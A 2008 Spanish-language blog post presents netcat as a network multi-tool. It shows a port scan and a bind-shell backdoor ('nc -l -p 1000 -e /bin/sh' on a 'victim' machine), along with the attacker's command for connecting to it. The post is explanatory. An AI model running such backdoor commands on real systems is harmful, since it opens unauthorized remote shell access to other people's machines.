Keep Walking

Netcat. Una navaja suiza.

Posted in hacking, Linux, Redes, shell, Sistemas by Martín on febrero 21, 2008

Netcat es probablemente lo más parecido a una navaja suiza de red, pero con esteroides. Es una herramienta que todo administrador debe tener a mano.

Netcat permite leer y escribir datos a través de sockets TCP y UDP. Eso es todo. En la simplicidad de esta utilidad reside su fortaleza.

Puede utilizarse como un port scanner. Si, podés realizar un escaneo de puertos sobre un host con el siguiente comando:

nc -v -w2 -z scanme.org 20-40

-v significa verbose y habilita una salida más detallada de información. Se puede agregar otra v para obtener un nivel más de detalle.

-w especifica a netcat que espere la cantidad indicada de segundos antes de decidir que seguir intentando es inútil.

-z nos asegura que netcat no envíe ningún dato a los puertos que están escuchando.

20-40 es el rango de puertos a través de los cuales netcat se esparcirá.

Una captura a modo de ejemplo:

netcat

Netcat también puede funcionar como backdoor. Con esto hay que tener cuidado porque netcat es, algunas veces, utilizado por crackers como backdoor. La siguiente sintaxis (en la máquina víctima) correrá una instancia de netcat escuchando en el puerto 1000:

nc -l -p 1000 -e /bin/sh

-l indica a netcat que corra en modo escucha.

-p especifica el número de puerto (en nuestro ejemplo el 1000) .

-e establece el programa o binario que correrá luego de una conexión exitosa. En nuestro ejemplo, el shell.

El atacante puede conectarse nuevamente a la máquina víctima, en el puerto especificado, usando otra instancia de netcat en su máquina:

nc -v IP_victima -p 1000

Donde IP_victima es la IP de la máquina en la que netcat fue previamente ejecutado con las opciones -l y -e.

Por supuesto que el atacante debe primero figurarse una forma de subir el binario de netcat sobre la máquina víctima.

Fuente: LinuxHaxor

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: